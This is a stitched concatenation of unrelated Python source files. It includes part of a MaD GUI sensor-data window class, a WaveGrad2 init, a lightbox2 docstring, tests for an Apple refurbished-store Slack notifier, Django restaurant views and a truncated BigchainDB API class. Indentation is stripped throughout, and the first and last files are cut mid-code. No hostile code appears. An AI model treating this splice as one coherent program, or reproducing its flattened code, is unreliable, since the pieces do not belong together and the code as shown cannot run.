"edit": self.ui.btn_edit_label,
"remove": self.ui.btn_remove_label,
"sync": self.ui.btn_sync_data,
}
self.menu_buttons = {
"load": self.ui.btn_load_data,
"algorithm": self.ui.btn_use_algorithm,
"export": self.ui.btn_export,
"save": self.ui.btn_save_data_gui_format,
}
# Setting up the plots
self.sensor_plots = {}
self.video_plot = None
self._configure_buttons()
# Setting up some attributes
self.data_types = None # data that the user wants to load/save (sensor, activities, and/or strides)
self._user_is_informed = False
self.closeEvent = self._close_event # doing this to have consistent method naming
self.global_data.bind(self.ui.label_displayed_data.setText, "data_file")
self.global_data.bind(self._plot_data, "plot_data", initial_set=False)
self.global_data.bind(self._set_sync, "sync_file", initial_set=False)
self.plot_state.bind(self._update_button_state, "mode", initial_set=True)
# Setup Key Event handler
self.key_event_handler = KeyEventHandler(plot_state=self.plot_state, parent=self)
self.keyPressEvent = self.key_event_handler.key_pressed
StateKeeper.setParent(self)
StateKeeper.announce_data_types.connect(self._set_data_types)
StateKeeper.save_sync.connect(self._save_sync)
# Note: Need to make all connections and ui setup before updating the value
self.global_data.base_dir = data_dir
self.global_data.plugins = list(plugins)
def check_arguments(self, plugins, labels, events):
for plugin in plugins:
self._check_argument(plugin, (BaseImporter, BaseAlgorithm, BaseExporter))
for label in labels:
self._check_argument(label, (BaseRegionLabel,))
if label.min_height > label.max_height:
raise ValueError(
f"For the class {label.__name__}, min_height is higher than max_height, please fix " f"that."
)
if label.max_height > 1:
raise ValueError(
f"For the class {label.__name__}, max_height is > 1, although it should be between 0 "
f"and 1. Please fix that."
)
for event in events:
self._check_argument(event, (BaseEventLabel,))
@staticmethod
def _get_element_base(plugin):
if issubclass(plugin, BaseRegionLabel):
return "labels"
if issubclass(plugin, BaseEventLabel):
return "events"
if issubclass(plugin, (BaseImporter, BaseAlgorithm, BaseExporter)):
return "plugin"
return "unknown"
def _check_argument(self, element, base_classes: Tuple):
if not issubclass(element, base_classes):
base = self._get_element_base(element)
if base == "unknown":
raise ValueError(
f"{element.__name__} must inherit from one of BaseImporter, BaseAlgorithm, "
f"BaseExporter, BaseRegionLabel, or BaseEventLabel but it does not."
)
raise ValueError(
f"You passed {element} with the keyword 'plugin' to the GUI. However, "
f"your plugin does not inherit from BaseImporter, BaseAlgorithm, or BaseExporter.\n"
f"You should have passed it with: start_gui({base}=[{element.__name__}])"
)
def _enable_buttons(self, enable: bool):
"""In the beginning we want the user to load data, so we just show the two buttons."""
for button in [
self.ui.btn_add_label,
self.ui.btn_edit_label,
self.ui.btn_remove_label,
self.ui.btn_sync_data,
self.ui.btn_export,
self.ui.btn_save_data_gui_format,
self.ui.btn_use_algorithm,
]:
if len(self.sensor_plots) == 1 and button == self.ui.btn_sync_data:
continue
button.setDisabled(not enable)
def is_data_plotted(self):
return bool(self.sensor_plots)
def _configure_buttons(self):
# buttons menu
self.ui.btn_use_algorithm.clicked.connect(self.use_algorithm)
self.ui.btn_load_data.clicked.connect(self.import_data)
self.ui.btn_save_data_gui_format.clicked.connect(self.save_data_gui_format)
self.ui.btn_export.clicked.connect(self.export)
self.ui.btn_load_data_gui_format.clicked.connect(self._handle_load_data_gui_format)
# buttons manual annotation
light = Config.theme.COLOR_LIGHT
dark = Config.theme.COLOR_DARK
light_hsl = light.toHsl()
even_lighter = light_hsl.lighter(150).toRgb()
for k, b in self.label_buttons.items():
b.setObjectName(k)
b.toggled.connect(self.on_main_buttons_clicked)
qt_light = f"rgb({light.red()}, {light.green()}, {light.blue()})"
qt_lighter = f"rgb({even_lighter.red()}, {even_lighter.green()}, {even_lighter.blue()})"
qt_dark = f"rgb({dark.red()}, {dark.green()}, {dark.blue()})"
b.setStyleSheet(
f"QPushButton"
f"{{\nborder:2px solid;\nborder-color: {qt_light};\npadding: 3px;\nbackground-color:{qt_light};"
f"\ntext-align: left;\ncolor:{qt_dark};\n"
f"border-radius: 5px;}}\n\n"
f"QPushButton:hover{{\nborder:2px solid;\nborder-color: {qt_lighter};\n}}"
f"QPushButton:disabled{{\n background-color: rgb(160,160,160);\n"
f"color: rgb(120,120,120)}}"
f"QPushButton:checked{{background-color: {qt_lighter};\n}}"
f"QPushButton:pressed{{\n background-color: {qt_lighter};\n}}"
)
b.setFlat(False)
for k, b in self.menu_buttons.items():
b.setObjectName(k)
b.toggled.connect(self.on_main_buttons_clicked)
b.setStyleSheet(
f"QPushButton"
f"{{\nborder:none;\npadding: 3px;\nbackground-color:rgb({light.red()},{light.green()},{light.blue()});"
f"\ntext-align: left;\ncolor:rgb({dark.red()},{dark.green()},{dark.blue()});\n"
f"border-radius: 0px;}}\n\n" # to remove shadow around button
f"QPushButton:hover{{\n background-color: rgb("
f"{even_lighter.red()},{even_lighter.green()},{even_lighter.blue()});\n}}"
f"QPushButton:disabled{{\n"
f"color: rgb(120,120,120)}}"
f"QPushButton:checked{{\n background-color: rgb("
f"{even_lighter.red()},{even_lighter.green()},{even_lighter.blue()});\n}}"
)
self._enable_buttons(False)
def on_main_buttons_clicked(self, new_state):
button = self.sender()
if new_state is False:
self.plot_state.mode = "investigate"
return
self.plot_state.mode = button.objectName()
def _update_button_state(self, new_mode: MODES):
for k, b in self.label_buttons.items():
if not b.isEnabled():
return
old_state = b.blockSignals(True)
b.setChecked(k == new_mode)
b.blockSignals(old_state)
def _unlink_plots(self):
        for plot in [*self.sensor_plots.values(), self.ui.video_plot]:
plot.set_coupled_plot(None)
def _save_sync(self):
sync = pd.DataFrame()
main_plot = self._get_main_plot()
if getattr(Config.settings, "SENSORS_SYNCHRONIZED", False):
for plot in self.sensor_plots.values():
if plot == main_plot:
continue
plot.sync_info = main_plot.sync_info
self._link_plots()
for plot_name, plot in self.sensor_plots.items():
sync = pd.concat([sync, pd.DataFrame(data=plot.sync_info, columns=[plot_name])], axis=1)
sync = pd.concat([sync, pd.DataFrame(data=self.video_plot.sync_info, columns=["Video"])], axis=1)
self.VideoWindow.set_sync(self.video_plot.sync_info["start"], self.video_plot.sync_info["end"])
# in case the desired file name was specified in plot data, store sync data automatically
plot_data_key = list(self.global_data.plot_data.keys())[0]
additional_data = self.global_data.plot_data[plot_data_key].additional_data
        data_specifier = "data_specifier" in additional_data
if data_specifier:
# automatically build sync file name
file_name = str(Path(self.global_data.video_file).parent) + os.sep + "{}_sync".format(
additional_data["data_specifier"])
file_ending = ".xlsx"
else:
file_name, file_ending = QFileDialog.getSaveFileName(self, "Save Synchronization File", filter=".xlsx")
if file_name is None:
return
sync.to_excel(file_name + file_ending)
UserInformation().inform("Sync file was stored under {}".format(file_name + file_ending))
for plot in self.sensor_plots.values():
plot.adapt_to_opening_video_window()
def _handle_load_data_gui_format(self):
if self.is_data_plotted():
answer = UserInformation().confirm("Plotted data might be overwritten. Do you want to continue?")
else:
answer = QMessageBox.Yes
if answer == QMessageBox.Yes:
file = self._ask_for_file_name(file_type="*.mad_gui")
self.load_data_from_pickle(file)
def _ask_for_file_name(self, file_type=None):
data_file = QFileDialog().getOpenFileName(
parent=None, caption="Select file to open", dir=str(self.global_data.base_dir), filter=file_type
)[0]
if data_file == "":
# User clicked cancel
return None
self.global_data.data_file = data_file
return data_file
def _set_data_types(self, types: Dict):
"""Saves which of [sensor data, activity labels, stride labels] the user wants to load/save."""
self.data_types = types
def _parse_labels_to_load(self, plot_data: Dict):
label_classes_to_load = []
for sensor_item in plot_data.values():
if "annotations" in sensor_item.keys():
label_classes_to_load.extend(sensor_item["annotations"].keys())
loadable_labels = []
unknown_labels = []
labels_and_events = (*self.global_data.labels, *self.global_data.events)
known_label_types = {label.name: label for label in labels_and_events}
for label_class in label_classes_to_load:
if label_class in known_label_types.keys():
loadable_labels.append(label_class)
else:
unknown_labels.append(label_class)
if len(unknown_labels) > 0:
UserInformation.inform(
f"The saved data has labels which this GUI does not know.\n\n"
f"Unknown label class: {unknown_labels}\n"
)
warnings.warn("Implement link to help.")
return loadable_labels
def load_data_from_pickle(self, file: str):
"""Load data from a .mad_gui file.
Parameters
----------
file
            Full path to a file that ends with `.mad_gui`. This file was previously created using
:func:`~mad_gui.MainWindow.save_data_gui_format` and contains sensor data, activity labels and stride
labels.
However, the user might previously have selected that not all of those should be loaded.
Which parts should be loaded is stored in `self.data_types`.
"""
if file is None:
# user clicked abort
return None, None
if file.split(".")[-1] != "mad_gui":
UserInformation.inform("Can only load files that end with '.mad_gui'.")
return None, None
self.setCursor(Qt.BusyCursor)
loaded_data = pd.read_pickle(file)
loadable_labels = self._parse_labels_to_load(loaded_data)
# Doing it in two lines, and exposing via self to enable testing this whole method
self.data_selector = DataSelector(parent=self, labels=set(loadable_labels))
self.data_selector.ask_user()
if not self.data_types["sensor_data"] and not self.global_data.plot_data:
UserInformation.inform(
"Can only plot labels if data is plotted. Please also tick 'Sensor data' or "
"load sensor data using the 'Load Data' button on the upper left."
)
self.setCursor(Qt.ArrowCursor)
return None, None
selected_data = [data_type for data_type, use in self.data_types.items() if use]
plot_data = {}
for plot_name, data in loaded_data.items():
plot_data[plot_name] = PlotData(parent=self).from_dict(data, selections=selected_data)
self.global_data.plot_data = plot_data
self.global_data.base_dir = Path(file).parent
# self._plot_data()
self.setCursor(Qt.ArrowCursor)
self._enable_buttons(True)
# self.menu.set_collapsed(True)
return loaded_data, loadable_labels
def _label_classes_backwards_compatibility(self, labels, known_label_types: Dict):
class StrideLabel(BaseRegionLabel):
name = "Stride Label"
min_height = 0.25
max_height = 0.75
class ActivityLabel(BaseRegionLabel):
name = "Activity Label"
min_height = 0.75
max_height = 1
for label_class in [StrideLabel, ActivityLabel]:
if label_class.__name__ in labels:
known_label_types[label_class.__name__] = label_class
if label_class.__name__ not in [label.__name__ for label in self.global_data.labels]:
self.global_data.labels = (*self.global_data.labels, label_class)
return known_label_types
def import_data(self):
"""Start dialog to import data.
This will open a :class:`mad_gui.LoadDataWindow`. In there, the user can select data to be loaded:
- sensor data
- annotations
- video
Additionally, the user can select the system that was used to record the sensor data and annotations.
        Depending on this selection, the path of the data to be loaded will be passed to the corresponding importer in
:mod:`mad_gui.plugins`.
"""
loaders = filter_plugins(self.global_data.plugins, BaseImporter)
if len(loaders) == 0:
UserInformation.inform(
"There were no loaders passed to the GUI. Read more about the fact why the plugin you created does "
"not show up in the GUI by clicking the link below.",
help_link="https://mad-gui.readthedocs.io/en/latest/troubleshooting.html#the-plugin-i-created-does-not-"
"show-up-in-the-GUI",
)
return
view = LoadDataDialog(self.global_data.base_dir, loaders=loaders, parent=self)
data, loader = view.get_data()
if data is None:
return
self.global_data.active_loader = loader
self.global_data.data_file = data.get("data_file_name", "")
self.global_data.sync_file = data.get("sync_file", "")
self.global_data.video_file = data.get("video_file", "")
self._parse_labels_to_load(data["plot_data_dicts"])
try:
plot_data = {k: PlotData().from_dict(v) for k, v in data["plot_data_dicts"].items()}
except Exception as e: # noqa
raise NotImplementedError(
f"Possibly there is an error in the data that was loaded using {loader}. Please "
f"see our guide in implementing an importer: https://mad-gui.readthedocs.io/en/la"
f"test/customization.html#implement-an-importer"
) from e
self.global_data.plot_data = plot_data
self.load_video(data.get("video_file", None))
self._set_sync(data.get("sync_file", None))
self._enable_buttons(True)
# self.menu.set_collapsed(True)
def _set_sync(self, sync_file: str):
"""Set the synchronization for each plot"""
if not sync_file:
return
sync = self.global_data.active_loader._get_video_signal_synchronization(sync_file)
unsynced_sensors = []
for plot_name, plot in self.sensor_plots.items():
try:
plot.sync_info = sync[plot_name]
plot.adapt_to_opening_video_window()
except KeyError:
unsynced_sensors.append(plot_name)
if len(unsynced_sensors) > 1:
UserInformation.inform(
f"Found a synchronization file ({sync_file}), however there is no info about "
f"the sensor(s) {unsynced_sensors}, therefore it is not synchronized."
)
if self.video_plot:
self.video_plot.sync_info = sync["Video"]
if self.VideoWindow:
self.VideoWindow.set_sync(start_frame=sync["Video"]["start"], end_frame=sync["Video"]["end"])
def _plot_data(self, data_dict: Dict[str, PlotData], start_time=None):
# if len(StateKeeper.loaded_data) == 3:
# start_time = StateKeeper.loaded_data[2]
# else:
# TODO: Implement start time
# start_time = None
set_cursor(self, Qt.BusyCursor)
# Delete all existing plots
plot_wrapper: QVBoxLayout = self.ui.plotwidget
for i_plot in list(self.sensor_plots.values()):
plot_wrapper.removeWidget(i_plot)
i_plot.deleteLater()
del i_plot
self.sensor_plots = {}
# Create new plots
for sensor_name, data in data_dict.items():
start_time = data.additional_data.get("start_time") # defaults to None if start_time is not set
plot = SensorPlot(
plot_data=data,
initial_plot_channels=getattr(Config.settings, "CHANNELS_TO_PLOT", None),
start_time=start_time,
label_classes=self.global_data.labels,
event_classes=self.global_data.events,
parent=self,
)
plot_wrapper.addWidget(plot)
self.sensor_plots[sensor_name] = plot
plot.set_title(sensor_name)
# Bind global mode change
self.plot_state.bind_property_bidirectional(plot.state, "mode", "mode", initial="set")
plots = list(self.sensor_plots.values())
plots[0].is_main_plot = True
if getattr(Config.settings, "SENSORS_SYNCHRONIZED", False):
# Bind the ranges of all plots together
self._link_plots()
# TODO: if self.plot_state.mode changes from sync to something else, we want to bind the plots again
set_cursor(self, Qt.ArrowCursor)
def _link_plots(self):
for p in self.sensor_plots.values():
if p.is_main_plot:
continue
self._get_main_plot().set_coupled_plot(p)
def load_video(self, video_path):
if not video_path:
return
if not os.path.exists(video_path):
UserInformation.inform(f"The selected file could not be found: {video_path}")
return
self.VideoWindow.start_video(video_path)
self.VideoWindow.show()
StateKeeper.video_duration_available.connect(self._initialize_video_plot)
self.ui.btn_sync_data.setDisabled(False)
def _initialize_video_plot(self):
StateKeeper.video_duration_available.disconnect(self._initialize_video_plot)
if self.video_plot:
self.ui.plotwidget.removeWidget(self.video_plot)
self.video_plot = VideoPlot(parent=self, video_window=self.VideoWindow)
self.video_plot.set_title("Video Plot")
self.video_plot.hide()
self.ui.plotwidget.addWidget(self.video_plot)
self.plot_state.bind_property_bidirectional(self.video_plot.state, "mode", "mode", initial="set")
self.video_plot.sync_info = self.VideoWindow.sync_info
def _get_main_plot(self):
return [plot for plot in self.sensor_plots.values() if plot.is_main_plot][0]
def use_algorithm(self):
"""Applies an algorithm to the plotted IMU data.
This will basically call :func:`mad_gui.plugins.BaseImporter.annotation_from_data`. Instead of the
`BaseImporter` a different importer specified in the :class:`mad_gui.LoadDataWindow` (dropdown menu)
might be used.
The activity and/or stride labels that will be generated by that method will then be passed to the plots,
which will subsequently plot the labels, see :func:`mad_gui.plot_tools.SensorPlot.set_activity_labels` and
:func:`mad_gui.plot_tools.SensorPlot._set_stride_labels`.
"""
if not self.is_data_plotted():
UserInformation(parent=self).inform("Please load sensor data before continuing.")
return
# if not UserInformation(parent=self).confirm(
# "Warning: Calculating new annotations might delete all currently "
# "displayed annotations!\nIt is up to the implemented algorithm, "
# "if the new annotations are added or if they replace the currently displayed "
# "annotations. Do you want to continue?"
# ):
# return
# Set state to investigate to force updating global state from plot
self.plot_state.mode = "investigate"
algorithms = filter_plugins(self.global_data.plugins, BaseAlgorithm)
if len(algorithms) == 0:
UserInformation.inform(
"There were no algorithms passed to the GUI. Read more about the fact why the plugin you created does "
"not show up in the GUI by clicking the link below.",
help_link="https://mad-gui.readthedocs.io/en/latest/troubleshooting.html#the-plugin-i-created-does-not-"
"show-up-in-the-gui",
)
return
set_cursor(self, Qt.BusyCursor)
dialog = PluginSelectionDialog(plugins=algorithms, parent=self)
try:
dialog.process_data(self.global_data.plot_data)
except Exception as error: # noqa
print(sys.exc_info()[0])
raise NotImplementedError(
"Possibly there is an error in the implementation of the algorithm. Please "
"see our guide in implementing an algorithm: https://mad-gui.readthedocs.io/en/latest/customization.ht"
"ml#implement-an-algorithm"
) from error
self.global_data.plot_data = dialog._data
set_cursor(self, Qt.ArrowCursor)
# actually this should be called automatically due to global_data.bind(_plot_data, "plot_data") but that does
# not work currently
# we could probably resolve it in mad_gui.plot_tools.plots.SensorPlot in the __init__ but it does not work yet
self._plot_data(self.global_data.plot_data)
def _save_data(self, data_to_save: PlotData):
save_file_name = QFileDialog().getSaveFileName(
None, "Save GUI data", str(Path(self.global_data.data_file).parent) + "/data.mad_gui", "*.mad_gui"
)[0]
if save_file_name != "":
pickable_data = {k: v.to_dict() for k, v in data_to_save.items()}
with open(save_file_name, "wb") as file:
pickle.dump(pickable_data, file, protocol=pickle.HIGHEST_PROTOCOL)
def save_data_gui_format(self):
"""Saves the displayed sensor data, sampling rate and displayed activity and stride labels into a pickle file.
The file ending will be `.mad_gui` to make clear it can be loaded again by this GUI. The data can be
re-loaded into the GUI using the `Load Data GUI format` button.
If you want to load this data in another application / script, you can do so using :func:`pandas.read_pickle()`.
"""
if not self.is_data_plotted():
UserInformation.inform("Please load data before continuing.")
return
# Set state to investigate to force updating global state from plot
self.plot_state.mode = "investigate"
self._save_data(self.global_data.plot_data)
StateKeeper.set_has_unsaved_changes(False)
def export(self):
"""Called when clicking the `Export data` button.
This button should be used to calculate features from the annotations. For example to calculate a
mean length of certain activities or strides. To do so, it opens a :class:`mad_gui.ExportResultsWindow`,
which is basically just used to select one of the exporters in :mod:`mad_gui.plugins`."""
if not self.is_data_plotted():
UserInformation(parent=self).inform("Please to load data before continuing.")
return
# Set state to investigate to force updating global state from plot
self.plot_state.mode = "investigate"
PluginSelectionDialog(plugins=filter_plugins(self.global_data.plugins, BaseExporter), parent=self).process_data(
self.global_data
)
def _close_event(self, ev):
if StateKeeper.gui_has_unsaved_changes:
answer = UserInformation().confirm("Recent changes have not been saved. Are you sure you want to exit?")
if answer == QMessageBox.No:
ev.ignore()
return
if self.VideoWindow:
self.VideoWindow.close()
self.close()
def _set_window_properties(self):
self.setAttribute(Qt.WA_DeleteOnClose)
self.setAttribute(Qt.WA_WindowPropagation)
self.setWindowTitle("MaD GUI")
|
from .WaveGrad2 import WaveGrad2
from .loss import WaveGrad2Loss
from .optimizer import ScheduledOptim |
"""
@file
@brief Resource for backend
`lightbox2 <https://github.com/lokesh/lightbox2>`_ for directive *image*.
"""
|
import decimal
from refurbished.parser import Product
from app.adapters import apple, slack
from app.domain import commands, model
from app.services import messagebus
def test_available_products(
mocker,
messagebus: messagebus.MessageBus,
refurbished_adapter: apple.RefurbishedStoreAdapter,
slack_adapter: slack.SlackAdapter,
):
mocker.patch.object(refurbished_adapter, "search")
refurbished_adapter.search.side_effect = [[
Product(
name='iPad Wi-Fi + Cellular 32GB ricondizionato',
url='https://www.apple.com/it/ipad-wifi-32gb',
price=decimal.Decimal('419.00'),
previous_price=decimal.Decimal('489.00'),
savings_price=decimal.Decimal('70.00')
),
Product(
name='iPad Wi-Fi + Cellular 128GB ricondizionato',
url='https://www.apple.com/it/ipad-wifi-cellular-128gb',
price=decimal.Decimal('499.00'),
previous_price=decimal.Decimal('0.00'),
savings_price=decimal.Decimal('0.00')
)]]
mocker.patch.object(slack_adapter, 'post_message')
slack_adapter.post_message.side_effect = [None]
cmd = commands.CheckRefurbished(store='it', products=['ipad'])
messagebus.handle(cmd, {})
message = {
'text': """
Found 2 ipad(s):
- <https://www.apple.com/it/ipad-wifi-32gb|iPad Wi-Fi + Cellular 32GB ricondizionato> at ~489.00~ *419.00* (-70.00)
- <https://www.apple.com/it/ipad-wifi-cellular-128gb|iPad Wi-Fi + Cellular 128GB ricondizionato> at *499.00*
"""
}
slack_adapter.post_message.assert_called_once_with(
message, {}
)
def test_unavailable_products(
mocker,
messagebus: messagebus.MessageBus,
refurbished_adapter: apple.RefurbishedStoreAdapter,
slack_adapter: slack.SlackAdapter,
):
mocker.patch.object(refurbished_adapter, "search")
refurbished_adapter.search.side_effect = [[]]
mocker.patch.object(slack_adapter, 'post_message')
slack_adapter.post_message.side_effect = [None]
cmd = commands.CheckRefurbished(store='it', products=['ipad'])
messagebus.handle(cmd, {})
message = {
'text': "Hey, can't find any 'ipad' in the 'it' store now 🤔"
}
slack_adapter.post_message.assert_called_once_with(
message, {}
)
|
import random
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.db.models import Q
from django.shortcuts import render,get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.views import View
from django.views.generic import TemplateView, ListView,DetailView,CreateView, UpdateView
from .models import RestaurantLocation
from .forms import RestaurantCreateForm,RestaurantLocationCreateForm
class RestaurantListView(LoginRequiredMixin,ListView):
def get_queryset(self):
return RestaurantLocation.objects.filter(owner=self.request.user)
class RestaurantDetailView(LoginRequiredMixin,DetailView):
def get_queryset(self):
return RestaurantLocation.objects.filter(owner=self.request.user)
class RestaurantCreateView(LoginRequiredMixin,CreateView):
form_class=RestaurantLocationCreateForm
template_name='form.html'
def form_valid(self,form):
instance = form.save(commit=False)
instance.owner= self.request.user #anonymoususer when not an authenticated user
return super(RestaurantCreateView,self).form_valid(form)
def get_context_data(self,*args,**kwargs):
context = super(RestaurantCreateView,self).get_context_data(*args, **kwargs)
context['title']='Add Restaurant'
return context
class RestaurantUpdateView(LoginRequiredMixin,UpdateView):
form_class=RestaurantLocationCreateForm
template_name='restaurants/detail-update.html'
def get_context_data(self,*args,**kwargs):
context = super(RestaurantUpdateView,self).get_context_data(*args, **kwargs)
context['title']='Update Restaurant'
return context
def get_queryset(self):
return RestaurantLocation.objects.filter(owner=self.request.user) |
import random
import math
import collections
from time import time
from itertools import compress
from bigchaindb.common import crypto, exceptions
from bigchaindb.common.util import gen_timestamp, serialize
from bigchaindb.common.transaction import TransactionLink, Metadata
import rethinkdb as r
import bigchaindb
from bigchaindb.db.utils import Connection
from bigchaindb import config_utils, util
from bigchaindb.consensus import BaseConsensusRules
from bigchaindb.models import Block, Transaction
class Bigchain(object):
"""Bigchain API
Create, read, sign, write transactions to the database
"""
# return if a block has been voted invalid
BLOCK_INVALID = 'invalid'
# return if a block is valid, or tx is in valid block
BLOCK_VALID = TX_VALID = 'valid'
# return if block is undecided, or tx is in undecided block
BLOCK_UNDECIDED = TX_UNDECIDED = 'undecided'
# return if transaction is in backlog
TX_IN_BACKLOG = 'backlog'
def __init__(self, host=None, port=None, dbname=None,
public_key=None, private_key=None, keyring=[],
backlog_reassign_delay=None):
"""Initialize the Bigchain instance
A Bigchain instance has several configuration parameters (e.g. host).
If a parameter value is passed as an argument to the Bigchain
__init__ method, then that is the value it will have.
Otherwise, the parameter value will come from an environment variable.
If that environment variable isn't set, then the value
will come from the local configuration file. And if that variable
isn't in the local configuration file, then the parameter will have
its default value (defined in bigchaindb.__init__).
Args:
host (str): hostname where RethinkDB is running.
port (int): port in which RethinkDB is running (usually 28015).
dbname (str): the name of the database to connect to (usually bigchain).
public_key (str): the base58 encoded public key for the ED25519 curve.
private_key (str): the base58 encoded private key for the ED25519 curve.
keyring (list[str]): list of base58 encoded public keys of the federation nodes.
"""
config_utils.autoconfigure()
self.host = host or bigchaindb.config['database']['host']
self.port = port or bigchaindb.config['database']['port']
self.dbname = dbname or bigchaindb.config['database']['name']
self.me = public_key or bigchaindb.config['keypair']['public']
self.me_private = private_key or bigchaindb.config['keypair']['private']
self.nodes_except_me = keyring or bigchaindb.config['keyring']
self.backlog_reassign_delay = backlog_reassign_delay or bigchaindb.config['backlog_reassign_delay']
self.consensus = BaseConsensusRules
# change RethinkDB read mode to majority. This ensures consistency in query results
self.read_mode = 'majority'
if not self.me or not self.me_private:
raise exceptions.KeypairNotFoundException()
self.connection = Connection(host=self.host, port=self.port, db=self.dbname)
def reconnect(self):
return r.connect(host=self.host, port=self.port, db=self.dbname)
def write_transaction(self, signed_transaction, durability='soft'):
"""Write the transaction to bigchain.
When first writing a transaction to the bigchain the transaction will be kept in a backlog until
it has been validated by the nodes of the federation.
Args:
signed_transaction (Transaction): transaction with the `signature` included.
Returns:
dict: database response
"""
signed_transaction = signed_transaction.to_dict()
# we will assign this transaction to `one` node. This way we make sure that there are no duplicate
# transactions on the bigchain
if self.nodes_except_me:
assignee = random.choice(self.nodes_except_me)
else:
# I am the only node
assignee = self.me
signed_transaction.update({'assignee': assignee})
signed_transaction.update({'assignment_timestamp': time()})
# write to the backlog
response = self.connection.run(
r.table('backlog')
.insert(signed_transaction, durability=durability))
return response
def reassign_transaction(self, transaction, durability='hard'):
"""Assign a transaction to a new node
Args:
transaction (dict): assigned transaction
Returns:
dict: database response or None if no reassignment is possible
"""
if self.nodes_except_me:
try:
federation_nodes = self.nodes_except_me + [self.me]
index_current_assignee = federation_nodes.index(transaction['assignee'])
new_assignee = random.choice(federation_nodes[:index_current_assignee] +
federation_nodes[index_current_assignee + 1:])
except ValueError:
# current assignee not in federation
new_assignee = random.choice(self.nodes_except_me)
else:
# There is no other node to assign to
new_assignee = self.me
response = self.connection.run(
r.table('backlog')
.get(transaction['id'])
.update({'assignee': new_assignee, 'assignment_timestamp': time()},
durability=durability))
return response
def get_stale_transactions(self):
"""Get a RethinkDB cursor of stale transactions
Transactions are considered stale if they have been assigned a node, but are still in the
backlog after some amount of time specified in the configuration
"""
return self.connection.run(
r.table('backlog')
.filter(lambda tx: time() - tx['assignment_timestamp'] > self.backlog_reassign_delay))
def validate_transaction(self, transaction):
"""Validate a transaction.
Args:
transaction (Transaction): transaction to validate.
Returns:
The transaction if the transaction is valid else it raises an
exception describing the reason why the transaction is invalid.
"""
return self.consensus.validate_transaction(self, transaction)
def is_valid_transaction(self, transaction):
"""Check whether a transaction is valid or invalid.
Similar to :meth:`~bigchaindb.Bigchain.validate_transaction`
but never raises an exception. It returns :obj:`False` if
the transaction is invalid.
Args:
transaction (:Class:`~bigchaindb.models.Transaction`): transaction
to check.
Returns:
The :class:`~bigchaindb.models.Transaction` instance if valid,
otherwise :obj:`False`.
"""
try:
return self.validate_transaction(transaction)
except (ValueError, exceptions.OperationError, exceptions.TransactionDoesNotExist,
exceptions.TransactionOwnerError, exceptions.DoubleSpend,
exceptions.InvalidHash, exceptions.InvalidSignature,
exceptions.FulfillmentNotInValidBlock):
return False
def get_transaction(self, txid, include_status=False):
"""Retrieve a transaction with `txid` from bigchain.
Queries the bigchain for a transaction, if it's in a valid or invalid
block.
Args:
txid (str): transaction id of the transaction to query
include_status (bool): also return the status of the transaction
the return value is then a tuple: (tx, status)
Returns:
A :class:`~.models.Transaction` instance if the transaction
was found, otherwise ``None``.
If :attr:`include_status` is ``True``, also returns the
transaction's status if the transaction was found.
"""
response, tx_status = None, None
validity = self.get_blocks_status_containing_tx(txid)
if validity:
# Disregard invalid blocks, and return if there are no valid or undecided blocks
validity = {_id: status for _id, status in validity.items()
if status != Bigchain.BLOCK_INVALID}
if validity:
tx_status = self.TX_UNDECIDED
# If the transaction is in a valid or any undecided block, return it. Does not check
# if transactions in undecided blocks are consistent, but selects the valid block before
# undecided ones
for target_block_id in validity:
if validity[target_block_id] == Bigchain.BLOCK_VALID:
tx_status = self.TX_VALID
break
# Query the transaction in the target block and return
response = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.get(target_block_id)
.get_field('block')
.get_field('transactions')
.filter(lambda tx: tx['id'] == txid))[0]
else:
# Otherwise, check the backlog
response = self.connection.run(r.table('backlog')
.get(txid)
.without('assignee', 'assignment_timestamp')
.default(None))
if response:
tx_status = self.TX_IN_BACKLOG
if response:
response = Transaction.from_dict(response)
if include_status:
return response, tx_status
else:
return response
def get_status(self, txid):
"""Retrieve the status of a transaction with `txid` from bigchain.
Args:
txid (str): transaction id of the transaction to query
Returns:
(string): transaction status ('valid', 'undecided',
or 'backlog'). If no transaction with that `txid` was found it
returns `None`
"""
_, status = self.get_transaction(txid, include_status=True)
return status
def search_block_election_on_index(self, value, index):
"""Retrieve block election information given a secondary index and value
Args:
value: a value to search (e.g. transaction id string, payload hash string)
index (str): name of a secondary index, e.g. 'transaction_id'
Returns:
:obj:`list` of :obj:`dict`: A list of blocks with only election information
"""
# First, get information on all blocks which contain this transaction
response = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.get_all(value, index=index)
.pluck('votes', 'id', {'block': ['voters']}))
return list(response)
def get_blocks_status_containing_tx(self, txid):
"""Retrieve block ids and statuses related to a transaction
Transactions may occur in multiple blocks, but no more than one valid block.
Args:
txid (str): transaction id of the transaction to query
Returns:
A dict of blocks containing the transaction,
e.g. {block_id_1: 'valid', block_id_2: 'invalid' ...}, or None
"""
# First, get information on all blocks which contain this transaction
blocks = self.search_block_election_on_index(txid, 'transaction_id')
if blocks:
# Determine the election status of each block
validity = {
block['id']: self.block_election_status(
block['id'],
block['block']['voters']
) for block in blocks
}
# NOTE: If there are multiple valid blocks with this transaction,
# something has gone wrong
if list(validity.values()).count(Bigchain.BLOCK_VALID) > 1:
block_ids = str([block for block in validity
if validity[block] == Bigchain.BLOCK_VALID])
raise exceptions.DoubleSpend('Transaction {tx} is present in '
'multiple valid blocks: '
'{block_ids}'
.format(tx=txid,
block_ids=block_ids))
return validity
else:
return None
def get_tx_by_metadata_id(self, metadata_id):
"""Retrieves transactions related to a metadata.
When creating a transaction one of the optional arguments is the `metadata`. The metadata is a generic
dict that contains extra information that can be appended to the transaction.
To make it easy to query the bigchain for that particular metadata we create a UUID for the metadata and
store it with the transaction.
Args:
metadata_id (str): the id for this particular metadata.
Returns:
A list of transactions containing that metadata. If no transaction exists with that metadata it
returns an empty list `[]`
"""
cursor = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.get_all(metadata_id, index='metadata_id')
.concat_map(lambda block: block['block']['transactions'])
.filter(lambda transaction: transaction['transaction']['metadata']['id'] == metadata_id))
transactions = list(cursor)
return [Transaction.from_dict(tx) for tx in transactions]
def get_txs_by_asset_id(self, asset_id):
"""Retrieves transactions related to a particular asset.
A digital asset in bigchaindb is identified by an uuid. This allows us to query all the transactions
related to a particular digital asset, knowing the id.
Args:
asset_id (str): the id of this particular asset.
Returns:
A list of transactions related to the asset. If no transaction exists for that asset it
returns an empty list `[]`
"""
cursor = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
